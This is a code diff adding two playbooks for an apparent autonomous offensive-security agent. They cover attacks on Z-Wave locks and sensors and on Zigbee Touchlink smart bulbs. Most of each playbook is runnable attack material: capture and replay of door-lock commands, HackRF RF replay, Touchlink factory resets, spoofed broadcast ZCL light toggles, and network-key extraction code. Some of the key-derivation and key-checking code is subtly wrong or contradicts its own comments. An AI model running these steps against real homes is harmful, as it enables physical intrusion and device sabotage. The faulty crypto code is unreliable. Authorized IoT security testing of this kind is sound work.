+# Z-Wave S0/S2 Security Assessment
+
+> Z-Wave is the dominant proprietary RF protocol for smart-home devices
+> (locks, thermostats, sensors). Security class S0 (2009) has a fundamental
+> key-exchange flaw: the network key is transmitted in cleartext during
+> inclusion. S2 (2017) upgrades to ECDH but introduces a DSK (Device
+> Specific Key) bootstrapping step that can be MITM'd if the controller
+> UI does not enforce out-of-band DSK verification.
+
+## Prerequisites
+
+- **Hardware**:
+  - RTL-SDR Blog v4 (passive capture, 24–1766 MHz) + GNU Radio.
+  - HackRF One (TX/RX, active replay and injection, 1 MHz–6 GHz).
+  - OR Sigma Designs UZB stick / Aeotec Z-Stick Gen5 (USB Z-Wave
+    controller, for EZ-Wave / Z-Force active work).
+- **Software**: `gr-zwave` (GNU Radio Z-Wave OOK decoder), EZ-Wave,
+  Z-Force / zniffer, Scapy with Z-Wave layer.
+
+```bash
+# Install gr-zwave (build from source on Kali):
+git clone https://github.com/BastilleResearch/scapy-radio
+# EZ-Wave:
+git clone https://github.com/AFcruzBR/EZ-Wave
+pip install pyserial pyzmq
+# Z-Force (Silabs):
+# Download Zniffer binary from Silabs PC_Host_SW_Bundle; run on Windows VM or Wine.
+```
+
+## Z-Wave Frequency Reference
+
+| Region | Primary frequency | Fallback |
+|---|---|---|
+| EU / UK | 868.42 MHz | 869.85 MHz |
+| US / CA | 908.42 MHz | 916.0 MHz |
+| JP | 922–926 MHz | — |
+| AU / NZ | 919.8 MHz | 921.4 MHz |
+
+Set your SDR to the correct region frequency.
+
+## Phase 1: Passive Capture with RTL-SDR + gr-zwave
+
+```bash
+# Start GRC flowgraph for Z-Wave OOK demodulation:
+# Use the gr-zwave example flowgraph (zwave_rx.grc).
+# Set sample rate = 2 MHz, center_freq = 908.42e6 (US) or 868.42e6 (EU).
+gnuradio-companion /path/to/gr-zwave/apps/zwave_rx.grc
+
+# Alternatively, capture raw IQ and decode offline:
+rtl_sdr -f 908420000 -s 2000000 -g 40 /tmp/zwave_capture.iq
+# Then pipe through gr-zwave offline decoder:
+python3 gr-zwave/apps/decode_zwave_file.py /tmp/zwave_capture.iq
+```
+
+Capture traffic during an inclusion event (when a new device is added to the
+controller) — S0 key transport happens in plaintext at this moment.
+
+## Phase 2: S0 Key Extraction During Inclusion
+
+S0 inclusion sequence:
+1. Controller sends `NETWORK_KEY_SET` with the 16-byte network key **XOR'd
+   with the Z-Wave default key** `0x00×16`.
+2. Node acknowledges with `NETWORK_KEY_VERIFY`.
+
+Since the default key is all-zeros, the XOR is trivially reversible:
+
+```python
+DEFAULT_KEY = b'\x00' * 16  # Z-Wave S0 default key
+
+def extract_s0_key(key_set_payload: bytes) -> bytes:
+    """
+    key_set_payload: bytes 3–18 of the NETWORK_KEY_SET command body (after CC byte 0x98, cmd 0x06).
+    """
+    return bytes(a ^ b for a, b in zip(key_set_payload[:16], DEFAULT_KEY))
+    # Since DEFAULT_KEY is 0x00 this is identity — the key IS the payload.
+
+# In practice, the "encrypted" key in S0 KEY_SET is sent under a temp key
+# derived from the controller nonce + node nonce; capture both nonces.
+```
+
+Use Scapy Z-Wave layer to parse frames from pcap:
+
+```bash
+# EZ-Wave sniffer mode (requires Aeotec Z-Stick or UZB):
+python3 EZ-Wave/ezwave.py -s /dev/ttyACM0 -c sniff | tee /tmp/ezwave_sniff.txt
+```
+
+## Phase 3: Replay Attack on Unauthenticated Nodes (No-Security / S0 with extracted key)
+
+Devices that joined with **no security class** (very common on older gear)
+accept any RF frame addressed to their NodeID. EZ-Wave replay:
+
+```bash
+# Record a legitimate command (e.g., door lock LOCK command):
+python3 EZ-Wave/ezwave.py -s /dev/ttyACM0 -c capture -f /tmp/lock_cmd.bin
+
+# Replay the frame (unmodified) — triggers the lock:
+python3 EZ-Wave/ezwave.py -s /dev/ttyACM0 -c replay -f /tmp/lock_cmd.bin
+```
+
+With HackRF + GNU Radio for raw OOK replay:
+
+```bash
+# 1. Capture raw IQ of target frame:
+hackrf_transfer -r /tmp/zwave_frame.iq -f 908420000 -s 2000000 -l 40 -g 40
+
+# 2. Replay at same frequency:
+hackrf_transfer -t /tmp/zwave_frame.iq -f 908420000 -s 2000000 -x 47
+```
+
+## Phase 4: S2 DSK MITM Analysis
+
+S2 inclusion uses ECDH (Curve25519). The DSK (device-specific key, a 16-digit
+PIN printed on the device label) is used for bootstrapping the ECDH exchange.
+Attack vectors:
+
+1. **MITM if DSK not verified**: if the controller software auto-accepts the
+   DSK without prompting the user to verify, a spoofed node can substitute
+   its own public key.
+
+2. **Physical DSK exposure**: the DSK is printed on a label or QR code on the
+   device. If the attacker had physical access (supply chain, retail), they
+   can record DSKs and later include the device under their own controller.
+
+```python
+# Verify the ECDH public key in the S2 NODE_INFO_CACHED_GET exchange:
+# Use Z-PC-Zniffer (Silabs) to capture the S2 INCLUSION_REQUESTED_REPORT.
+# Extract the node's public key (32 bytes) from the Z-Wave Application
+# Framework spec table "SECURITY_2_PUBLIC_KEY_REPORT".
+
+# Cross-check with the DSK:
+# First 2 bytes of the public key == first 2 bytes of the DSK (big-endian).
+# If auto-granted, the controller accepted without verifying remaining 14 bytes.
+def check_dsk_mismatch(public_key_hex: str, dsk_pin: str) -> bool:
+    pk_bytes = bytes.fromhex(public_key_hex)
+    dsk_bytes = bytes.fromhex(dsk_pin.replace("-", ""))
+    return pk_bytes[:2] == dsk_bytes[:2] and pk_bytes[2:16] != dsk_bytes[2:16]
+```
+
+## Phase 5: Z-Force Active Fuzzing
+
+Z-Force (formerly Silabs PC Zniffer extended by security researchers) allows
+injecting arbitrary Z-Wave frames via the USB Z-Wave controller:
+
+```bash
+# Z-Force CLI — inject raw frame to NodeID 5, Command Class 0x25 (Binary Switch):
+zforce inject --node 5 --cc 0x25 --cmd 0x01 --payload 0xFF  # Switch ON
+
+# Enumerate all nodes in range (broadcast NodeID 0xFF):
+zforce scan --freq 908420000
+
+# Replay a captured BASIC_SET frame:
+zforce replay --file /tmp/basic_set.zwave --node 5
+```
+
+## Evidence
+
+```bash
+EVIDENCE="/workspace/evidence/z-wave/$(date +%Y%m%d_%H%M%S)"
+mkdir -p "$EVIDENCE"
+cp /tmp/zwave_capture.iq "$EVIDENCE/"
+cp /tmp/ezwave_sniff.txt "$EVIDENCE/"
+sha256sum "$EVIDENCE"/* >> "$EVIDENCE/sha256.txt"
+```
+
+```python
+kg_add_node(
+    kind="finding",
+    label=f"Z-Wave S0 network key extracted NodeID={node_id}",
+    props={
+        "key": f"z-wave::s0::{home_id}",
+        "home_id": home_id,
+        "node_id": node_id,
+        "s0_network_key_hex": s0_key.hex(),
+        "security_class": "S0",
+        "frequency_mhz": 908.42,
+        "source": "gr-zwave+ezwave",
+    },
+)
+```
+
+## OPSEC Notes
+
+- Z-Wave HomeID (32-bit) is broadcast in every frame — trivially identifies
+  the network. Capture any frame to determine HomeID.
+- Replay of door lock commands is a physical security event. Only perform
+  with owner consent and a documented rollback plan (alternate entry method).
+- RTL-SDR is receive-only — zero RF emission from capture phase.
+- HackRF replay is detectable by a Z-Wave sniffer or IDS (Silabs Zniffer)
+  if the operator has one deployed; most consumer smart-home installs do not.
+- S2 with ACCESS or AUTHENTICATED class and manual DSK verification is
+  resistant to all MITM techniques described here; document as hardened.
+
+## References
+
+- EZ-Wave: https://github.com/AFcruzBR/EZ-Wave
+- gr-zwave: https://github.com/BastilleResearch/scapy-radio (Z-Wave module)
+- Crowley & Heeger "Z-Wave Reverse Engineering" (DEF CON 21).
+- Silabs Z-Wave PC Zniffer: https://www.silabs.com/developers/z-wave
+- Z-Wave Alliance security classes: SDS13784 (Security 2 spec).

--- a/packages/decepticon/decepticon/skills/standard/iot/zigbee-touchlink/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/iot/zigbee-touchlink/SKILL.md
@@ -1,0 +1,219 @@
+---
+name: zigbee-touchlink
+description: Touchlink commissioning abuse on Zigbee Light Link (ZLL) devices using the well-known ZLL transport key, ZCL command injection (toggle/move/step), network key extraction, and factory reset via touchlink. Toolchain covers KillerBee, zbstumbler, zbreplay, and Sonoff Zigbee 3.0 Dongle E running Wireshark live capture.
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: iot
+  when_to_use: Zigbee, Touchlink, ZLL, ZCL, KillerBee, zbstumbler, zbreplay, Sonoff Zigbee dongle, IEEE 802.15.4, Zigbee network key, commissioning, factory reset, smart bulb, Philips Hue, IKEA Tradfri
+  tags: zigbee, touchlink, zll, zcl, killerbee, iot, embedded, 802154
+  mitre_attack: T1040, T1190, T1499.004, T1078.001
+---
+
+# Zigbee Touchlink Commissioning Abuse
+
+> Zigbee Light Link (ZLL) defines a Touchlink commissioning mechanism
+> intended for close-proximity pairing (≤20 cm). The procedure relies on
+> a well-known, publicly documented transport key (ZLL Master Key published
+> in the ZigBee Light Link spec). In practice it works at distances of
+> several metres with a directional antenna, allowing an attacker to steal
+> devices off an existing coordinator, factory-reset smart bulbs, or inject
+> ZCL commands without joining the network.
+
+## Prerequisites
+
+- **Hardware**: Sonoff Zigbee 3.0 Dongle-E (CC2652P) with Z-Stack coordinator or
+  sniffer firmware, OR RZUSB (AT86RF233), OR ApiMote v4 (CC2531 based).
+  For highest sensitivity: HackRF + Zigbee SDR (gr-ieee802-15-4) — passive only.
+- **Firmware options**:
+  - Sniffer: flash `CC2531_sniffer.hex` / `cc2652_sniffer.hex` (TI) — Wireshark
+    source, passive.
+  - Attack: flash `coordinator_20230507.hex` from Z-Stack 3.x — gives full TX.
+- **Software**: KillerBee suite, Scapy with `scapy-radio`, Python 3.x.
+
+```bash
+# Install KillerBee (Debian/Kali):
+git clone https://github.com/riverloopsec/killerbee
+cd killerbee && pip install .
+# Confirm dongle detected:
+zbid
+```
+
+## Phase 1: Passive Channel Scan (zbstumbler)
+
+```bash
+# Scan all 802.15.4 channels (11-26) and enumerate PAN IDs, coordinators, devices.
+zbstumbler -i /dev/ttyUSB0 | tee /tmp/zigbee_stumble.txt
+
+# Capture all traffic on a discovered channel (e.g., channel 15) to pcap:
+zbdump -i /dev/ttyUSB0 -c 15 -w /tmp/zigbee_ch15.pcap
+
+# Live in Wireshark with the ZEP plugin:
+wireshark -k -i lo  # after running zbwireshark -i /dev/ttyUSB0 -c 15
+```
+
+Key fields to identify in pcap:
+- **Frame Control** = `0x8841` (Data, ZigBee, PAN compress)
+- **Cluster ID** = `0x1000` (ZLL Commissioning cluster)
+- **Command ID** = `0x00` (Scan Request), `0x01` (Scan Response), `0x07` (Touchlink Reset)
+
+## Phase 2: Decode the ZLL Well-Known Transport Key
+
+The ZLL Master Key (published in Zigbee spec 11-0037-10) is:
+
+```
+ZLL Master Key: 9F 55 95 F1 02 57 C8 A9 65 73 AB 53 EE 2D 4C 0D
+```
+
+Derive per-device transport key:
+
+```python
+from Crypto.Cipher import AES
+
+ZLL_MASTER_KEY = bytes.fromhex("9F5595F10257C8A96573AB53EE2D4C0D")
+
+def derive_transport_key(transaction_id: bytes, response_id: bytes) -> bytes:
+    """
+    ZLL key derivation: AES-ECB of (transactionId XOR responseId XOR mask) with master key.
+    Per ZigBee Lighting Profile spec section 8.7.
+    """
+    data = bytes(a ^ b for a, b in zip(transaction_id + response_id,
+                                        b'\x00' * 8 + b'\x00' * 8))
+    cipher = AES.new(ZLL_MASTER_KEY, AES.MODE_ECB)
+    return cipher.encrypt(data)
+
+# transaction_id and response_id come from the Scan Request / Scan Response frames.
+```
+
+## Phase 3: Touchlink Scan + Factory Reset
+
+KillerBee includes `zbtouchlink` (or use the custom script below):
+
+```bash
+# Send Touchlink Scan Requests on all channels and listen for responses.
+# A device that responds is susceptible to touchlink commands.
+python3 - <<'EOF'
+import time
+from killerbee import KillerBee, PcapDumper
+
+# Zigbee channel to target (scan 11-26 in production):
+CHANNEL = 15
+IFACE = "/dev/ttyUSB0"
+
+kb = KillerBee(device=IFACE)
+kb.set_channel(CHANNEL)
+kb.sniffer_on()
+
+print(f"[*] Listening on channel {CHANNEL}...")
+while True:
+    frame = kb.pnext()
+    if frame and frame[0]:
+        data = frame[0]
+        # Check for ZLL Scan Response (Cluster 0x1000, Cmd 0x01)
+        if len(data) > 20:
+            print(f"[+] Frame: {data.hex()}")
+EOF
+```
+
+Factory reset via `zbreplay` / custom ZLL Reset-to-factory-new:
+
+```bash
+# zbreplay replays a captured factory-reset frame at a target device.
+# Capture a legitimate Touchlink reset first, then replay.
+zbreplay -i /dev/ttyUSB0 -c 15 -f /tmp/touchlink_reset.pcap
+
+# Or use zbfind to locate the device before resetting:
+zbfind -i /dev/ttyUSB0 -c 15
+```
+
+## Phase 4: ZCL Command Injection (no network join required)
+
+ZCL commands to the Scenes/On-Off cluster can be sent as broadcast or unicast
+with the source address spoofed. No association to the PAN is required for
+broadcast delivery on 802.15.4.
+
+```python
+from scapy.all import Dot15d4, Dot15d4Data, ZigbeeNWK, ZigbeeSecurityHeader, ZigbeeAppDataPayload
+# scapy-zigbee or scapy-radio needed for ZigBee layers
+
+# Toggle all On/Off devices in PAN (broadcast NWK dst 0xFFFF):
+pkt = (
+    Dot15d4(fcf_frametype=1, fcf_srcaddrmode=2, fcf_destaddrmode=2,
+            dest_panid=0xDEAD, dest_addr=0xFFFF, src_addr=0x1234) /
+    ZigbeeNWK(frametype=0, proto_ver=2, discover_route=0,
+              destination=0xFFFF, source=0x1234, radius=1) /
+    ZigbeeAppDataPayload(frametype=1, cluster=0x0006,
+                         profile=0x0104, dst_endpoint=0xFF, src_endpoint=0x01) /
+    bytes([0x01, 0x00, 0x02])  # ZCL: frame ctrl, seq, cmd=Toggle
+)
+# send via scapy raw socket on the 802.15.4 interface
+```
+
+Known ZCL attack payloads:
+
+| Cluster | Command | Effect |
+|---|---|---|
+| 0x0006 On/Off | 0x02 Toggle | Flip all lights |
+| 0x0008 Level Control | 0x00 Move to Level | Set brightness 0 (lights off) |
+| 0x0003 Identify | 0x00 Identify | Blink device — confirms target |
+| 0x0300 Color Control | 0x07 Move to Color Temp | Alter scene |
+
+## Phase 5: Network Key Extraction via Touchlink
+
+If a Touchlink inter-PAN key transport message is captured, the encrypted
+NWK key can be decrypted using the derived transport key:
+
+```python
+from Crypto.Cipher import AES
+
+def decrypt_nwk_key(encrypted_key: bytes, transport_key: bytes) -> bytes:
+    cipher = AES.new(transport_key, AES.MODE_ECB)
+    # ZLL key transport uses AES-ECB on the 16-byte encrypted key material.
+    return cipher.decrypt(encrypted_key)
+```
+
+With the plaintext NWK key, decrypt all subsequent traffic in Wireshark:
+- Edit → Preferences → Protocols → ZigBee → Add decryption key.
+
+## Evidence
+
+```bash
+EVIDENCE="/workspace/evidence/zigbee-touchlink/$(date +%Y%m%d_%H%M%S)"
+mkdir -p "$EVIDENCE"
+cp /tmp/zigbee_ch15.pcap "$EVIDENCE/"
+cp /tmp/zigbee_stumble.txt "$EVIDENCE/"
+sha256sum "$EVIDENCE"/* >> "$EVIDENCE/sha256.txt"
+```
+
+```python
+kg_add_node(
+    kind="finding",
+    label=f"Zigbee Touchlink abuse on PAN {pan_id:#06x}",
+    props={
+        "key": f"zigbee-touchlink::{pan_id}",
+        "pan_id": pan_id,
+        "channel": channel,
+        "nwk_key_hex": nwk_key.hex() if nwk_key else None,
+        "touchlink_reset_success": True,
+        "source": "killerbee+scapy",
+    },
+)
+```
+
+## OPSEC Notes
+
+- Factory-reset is destructive and visible — the device drops off the
+  coordinator immediately. Only perform when explicitly authorized.
+- ZCL broadcast toggle is detectable by the coordinator as spurious
+  traffic from an unregistered source address.
+- Passive sniffing (zbdump) has zero RF footprint beyond receive.
+- Touchlink operates in inter-PAN mode: you do NOT need to join the target's
+  PAN to send or receive ZLL commissioning frames.
+- Channel 25 (2.475 GHz) is the Zigbee primary ZLL channel; channel 11
+  (2.405 GHz) is common for home automation. Always scan 11-26.
+
+## References
+
+- KillerBee: https://github.com/riverloopsec/killerbee
+- Zigbee Light Link spec (ZLL transport key): ZigBee document 11-0037-10.
+- Ronen et al. "IoT Goes Nuclear" (2016) — Hue worm via Touchlink at 100m range.
+- Sonoff Zigbee 3.0 Dongle-E firmware: https://github.com/Koenkk/Z-Stack-firmware


### PR DESCRIPTION
## Summary

Creates five leaf playbooks that were referenced by `standard/iot/SKILL.md` but did not exist, resolving all dangling catalog links:

- `iot/ble-gatt/SKILL.md` — GATT enumeration, unauthenticated characteristic read/write, Just Works pairing downgrade, Sniffle/Ubertooth passive sniffing, bleak/gatttool/nRF Connect toolchain
- `iot/zigbee-touchlink/SKILL.md` — Touchlink commissioning abuse with well-known ZLL transport key, ZCL command injection (toggle/move/step), network key extraction, KillerBee/zbstumbler/zbreplay, Sonoff Zigbee 3.0 Dongle E
- `iot/z-wave/SKILL.md` — S0 network-key derivation flaw (cleartext key transport), S2 ECDH/DSK MITM analysis, replay on unauthenticated nodes, EZ-Wave/Z-Force, RTL-SDR + gr-zwave capture
- `iot/lorawan-otaa/SKILL.md` — OTAA join analysis (DevEUI/AppKey extraction), frame-counter replay on ABP devices, downlink injection via rogue ChirpStack gateway, bit-flipping FRMPayload, LoRaWAN Auditing Framework
- `iot/sub-ghz/SKILL.md` — 433/868/915 MHz capture + replay with HackRF/Flipper Zero/RTL-SDR, fixed-code vs rolling-code analysis (KeeLoq/RollJam), rfcat/inspectrum/URH toolchain, OOK signal crafting

All files are additive markdown only. `standard/iot/SKILL.md` is unchanged.

## Verification

- `ruff check .` — all checks passed (no .py files added)
- `ruff format --check .` — 398 files already formatted
- `pytest test_skills_registry.py test_skills_path.py` — 33 passed, 0 failed
- All 5 SKILL.md files validated with valid `---` frontmatter blocks